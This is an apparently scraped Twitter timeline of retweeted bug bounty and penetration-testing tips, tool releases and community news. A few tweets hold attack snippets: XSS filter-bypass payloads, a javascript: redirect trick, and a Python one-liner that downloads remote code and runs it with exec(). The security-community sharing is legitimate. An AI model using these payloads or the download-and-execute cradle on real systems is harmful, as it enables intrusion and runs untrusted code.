-
Nate Retweeted
This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else. https://blog.assetnote.io/bug-bounty/2020/02/01/expanding-attack-surface-react-native/ …
-
Nate Retweeted
I've been beta testing this update for a while, it's a good one :) https://twitter.com/Burp_Suite/status/1223285422337462278 …
-
Nate Retweeted
#ProTip For a stealthier @Burp_Suite usage, tick "Proxy > Options > Miscellaneous > Disable web interface" https://twitter.com/AffableKraut/status/1193963821020385289 …
-
Nate Retweeted
Excited to officially announce The Syndicate, our 4-person live hacking team. We are kicking off the year in San Francisco at #h1415. We will be donating 5% of all live event earnings to charity and 5% of our time to volunteering for all of 2020 and beyond. @Hacker0x01 pic.twitter.com/wdQJKc9g1Y
-
Nate Retweeted
An excellent talk by @ajxchapman: clear methodology, novel bugs and interesting links https://www.youtube.com/watch?v=AQCvfzwcGso …
-
Nate Retweeted
GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter' pic.twitter.com/RjRzccus5J
-
Nate Retweeted
#BugBountyTip time: combine Arjun from @s0md3v with Burp Intruder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" #bugbountytips #pentest RT & L
-
Nate Retweeted
Python equivalent of PowerShell IEX cradle: python -c 'import urllib2;r=urllib2.urlopen("https://raw.githubusercontent.com/n00py/ReadingList/master/test.py …");exec(r.read())' Let me know if anyone has a better way to do it, but this seems to work.
-
Nate Retweeted
I was bored and felt like sharing.. So I launched an "Instagram Live" session and pushed record. The session lasted roughly for an hour and contained about 28 questions and 35+ of my answers. Here's the "Director's Cut" trimmed for your pleasure. https://youtu.be/aOvpKwbeeSY #bugbounty pic.twitter.com/N6kmTa65JD
-
Nate Retweeted
Everyone likes free training. Right? The Adversary Tactics: Powershell course has been retired from SpecterOps delivery. The course material has been made public. https://twitter.com/SpecterOps/status/1220056424866353158 …
-
Nate Retweeted
"We must use time as a tool, not as a crutch." #BSidesSLC2020 @professor__plum pic.twitter.com/J2vMew2np9
-
Nate Retweeted
2020 #BugBountyGoals - Pay 6,000,613 USD in rewards - Celebrate 10 year @GoogleVRP anniversary - Meet more Bug Hunters!
-
Nate Retweeted
So you believe UUIDs are a sufficient protection against IDORs? Think again! Thanks for the #BugBountyTip, @securinti pic.twitter.com/zx5Xn7iDrE
-
Nate Retweeted
Just got laid off. 5+ years at Bugcrowd. What a journey. I will need help finding something new. Guess 2020 will be the start of something by different. Really tough day for me.
-
Nate Retweeted
Just posted Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2. Using a payload containing three different programming languages :) https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database …
-
Nate Retweeted
Back to blogging! CSRF-protected forms, @Burp_Suite Intruder, and no macros. A step-by-step walkthrough based on @DVWA that you can follow along at home... https://www.agarri.fr/blog/archives/2020/01/13/intruder_and_csrf-protected_form_without_macros/index.html …
-
Nate Retweeted
Responder 3.0.0.0 is out! Massive upgrade, support for both py3 and py2, many bug fixes, enhancements and Q.A++ on all servers, poisoners and tools. Enjoy! ;) https://github.com/lgandx/Responder/releases/tag/v3.0.0.0 …
-
Nate Retweeted
#BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 (or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
-
Nate Retweeted
While pentesting webapps, whenever you notice a redirect, check what caused it. If it's a client side redirect (caused by JavaScript), try redirecting to javascript:alert(), now you have XSS!
